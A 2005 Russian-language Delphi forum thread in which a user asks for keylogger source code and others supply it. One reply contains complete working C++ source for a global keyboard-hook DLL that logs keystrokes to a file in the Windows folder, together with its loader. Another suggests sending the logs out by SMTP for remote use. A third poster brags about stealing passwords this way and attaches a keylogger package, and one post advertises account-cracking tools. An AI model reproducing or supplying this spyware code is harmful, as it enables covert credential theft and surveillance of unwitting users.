Нужны исходники кейлоггера на Delphi

Тема в разделе "Delphi - Система", создана пользователем buts, 11 мар 2005.

Статус темы:
Закрыта.
  1. buts

    buts Гость

    люди, дайте исходников кейлогеров на Delphi
    а то чужими пользовать не хочу, хочу под себе сделать
     
  2. Artexoid

    Artexoid Гость

    Что такое Кейлогеры ?))
     
  3. Barmutik

    Barmutik Гость

    Хороший правильный кейлогер никтотак не выложит .. исходники простейших есть на www.torry.net иил смотри
    функцию SetWindowHookEx

    Artexoid
    Кейлоггер -программа отслеживающая нажатия всех клавиш и сохраняющая для дальнейшего анализа.
     
  4. admin

    admin Well-Known Member

    Регистрация:
    8 авг 2003
    Сообщения:
    2.811
    Симпатии:
    0
    Artexoid
    delphiworld.narod.ru
    там может быть вполне такое
     
  5. Artexoid

    Artexoid Гость

    Barmutik
    Серёга
    Во спасибо ра разъеснение :(. Я тут с вами умней стану !!!
    Классный форум !!!!
     
  6. Boralnd

    Boralnd Гость

    Если будешь писать на Дельфе - неплохо сделать еще и поддержку пересылки данных по почте через TidSMTP.
    Для удаленного юзания))
     
  7. buts

    buts Гость

    Boralnd
    Это я уже нашел, написал
    уже удаленно врубаю\вырубыю процессы
    а вот терь логер хочу написать
     
  8. Oleg

    Oleg Гость

    Имеется DBF-таблица в которой один столбец это время в секундах, с начала отчетного периода
    требуется перевести секунды в формат чч:мм:сс. Процедура для перевода есть.
    А вот как присвоить эту процедуру всему столбцу незнаю.
    Если кто знает, помогите. За ранее благодарен
     
  9. Гость

    www.vzlom08.narod.ru Программы для программы для взлома ICQ, для взлома e-mail.для взлома паролей Lineage2, кейлогер.
     
  10. Dottik

    Dottik Гость

    Нлобальный перехват клавиш необходимо организовать через длл:
    Вот один из возможных вариантов реализации:

    [codebox]#include <windows.h>
    #include <shlobj.h>
    #include <stdlib.h>
    #include <stdio.h>

    LRESULT CALLBACK KbdHook(int code,WPARAM wParam,LPARAM lParam);

    inline bool BIT30(LPARAM val)
    {
    return val&0x40000000;
    }

    int VkToChar(UINT vk,LPWORD ret)
    {
    char kb[256];
    GetKeyboardState((PBYTE)kb);
    return ToAscii(vk,
    0,
    (PBYTE)kb,
    ret,
    0);
    }

    inline DWORD WriteToFile(HANDLE hFile,void *data,int len)
    {
    DWORD wr;
    WriteFile(hFile,
    data,
    len,
    &wr,
    NULL);
    return wr;
    }

    HHOOK hhk;
    HINSTANCE hInst;
    char WindowsFolder[MAX_PATH];

    extern "C" __declspec(dllexport) bool SetHook(bool Set);

    BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
    {
    GetWindowsDirectory(WindowsFolder, MAX_PATH);
    hInst = (HINSTANCE)hModule;
    return TRUE;
    }

    bool SetHook(bool Set)
    {
    if(Set)
    {
    hhk = SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KbdHook,hInst,0);

    if(!hhk)return
    false;
    return true;
    }
    else
    {
    UnhookWindowsHookEx(hhk);
    return true;
    }
    }

    LRESULT CALLBACK KbdHook(int code,WPARAM wParam,LPARAM lParam)
    {
    HANDLE hFile;

    if(code==HC_ACTION)
    {
    //30uj bit = 1 , jakwo natuskajyt`, = 0 jakwo vidpyskajyt`
    if(BIT30(lParam))
    {
    WORD ret;
    if(VkToChar(wParam,&ret))
    {
    char cWrite[32];
    char key = ret;
    char bufStr[MAX_PATH]; // path to file
    sprintf(bufStr,"%s\\%s",WindowsFolder,"klava.txt");
    //probyjemo vidkrutu isnyjychuj file
    hFile = CreateFile(bufStr,
    GENERIC_READ|GENERIC_WRITE,
    FILE_SHARE_READ,
    NULL,
    CREATE_NEW,
    FILE_ATTRIBUTE_NORMAL,
    NULL);
    // jakwo ne isnyje, bacajemo novuj
    if(hFile==INVALID_HANDLE_VALUE)
    {
    hFile = CreateFile(bufStr,
    GENERIC_READ|GENERIC_WRITE,
    FILE_SHARE_READ,
    NULL,
    OPEN_EXISTING,
    FILE_ATTRIBUTE_NORMAL,
    NULL);
    //jakwo ne vujwlo novuj , pracyjemo dali bez zapusy :)
    if(hFile==INVALID_HANDLE_VALUE)
    {
    return CallNextHookEx(hhk,code,wParam,lParam);
    }
    }
    SetFilePointer(hFile,NULL,NULL,FILE_END);
    switch(key)
    {
    case 13://ENT
    cWrite[0] = 'E';
    cWrite[1] = 'N';
    cWrite[2] = 'T';
    cWrite[3] = 'E';
    cWrite[4] = 'R';
    cWrite[5] = 0;
    break;
    case 8://BSP
    cWrite[0] = 'B';
    cWrite[1] = 'S';
    cWrite[2] = 'P';
    cWrite[3] = 'A';
    cWrite[4] = 'C';
    cWrite[5] = 'E';
    cWrite[6] = 0;
    break;
    case 27://ESC
    cWrite[0] = 'E';
    cWrite[1] = 'S';
    cWrite[2] = 'C';
    cWrite[3] = 'A';
    cWrite[4] = 'P';
    cWrite[5] = 'E';
    cWrite[6] = 0;
    break;
    default:
    cWrite[0] = key;
    cWrite[1] = 0;
    break;
    }
    WriteToFile(hFile,cWrite,strlen(cWrite));
    CloseHandle(hFile);
    }
    }
    }
    return CallNextHookEx(hhk,code,wParam,lParam) ;
    }


    Программа для загрузки длл:
    #include <WINDOWS.H>
    typedef bool (*SETHOOK)(bool);
    int WINAPI WinMain(HINSTANCE hInst,HINSTANCE,LPSTR,int)
    {
    HANDLE hMutex = OpenMutex(MUTEX_ALL_ACCESS,FALSE,"klava.txt.OneInstance");
    if(!hMutex)
    {
    hMutex = CreateMutex(NULL,TRUE,"klava.txt.OneInstance");
    }
    else
    return 0;
    HINSTANCE hDll;
    hDll = LoadLibrary("w32_kl_srv.dll");
    if(!hDll)
    return 0;
    MSG msg;
    SETHOOK sh;
    sh = (SETHOOK)GetProcAddress(hDll,"SetHook");
    if(sh)
    {
    sh(true);
    }
    while(GetMessage(&msg,0,0,0))
    {
    TranslateMessage(&msg);
    DispatchMessage(&msg);
    }
    if(sh)sh(false);
    return 0;
    }[/codebox]
     
  11. Coldfate

    Coldfate Гость

    Если кому нужно, пишите сюда мыла (или прямо на coldfate@yandex.ru) - вышлю полный исходник dll-ловушки для кейлоггера с указанием, как пользоваться и прочими аддонами вроде сервиса. Прога проверена - таким способам я таскаю пароли на интернет. :D
     
  12. Coldfate

    Coldfate Гость

    Ура! Я понял, как присоединять файлы!! Теперь Вы просто можете скачать файлы отсюда (если ещё нужно; по-моему, тема уже бородой обросла!). Я убрал все exe, чтобы не мучить форум, поэтому компилируйте все dpr-ки, которые найдёте. И прочитайте файл README.HTM!!!!!!!
     

    Вложения:

    • tkserv.rar
      Размер файла:
      346,4 КБ
      Просмотров:
      449
Загрузка...
Статус темы:
Закрыта.

Поделиться этой страницей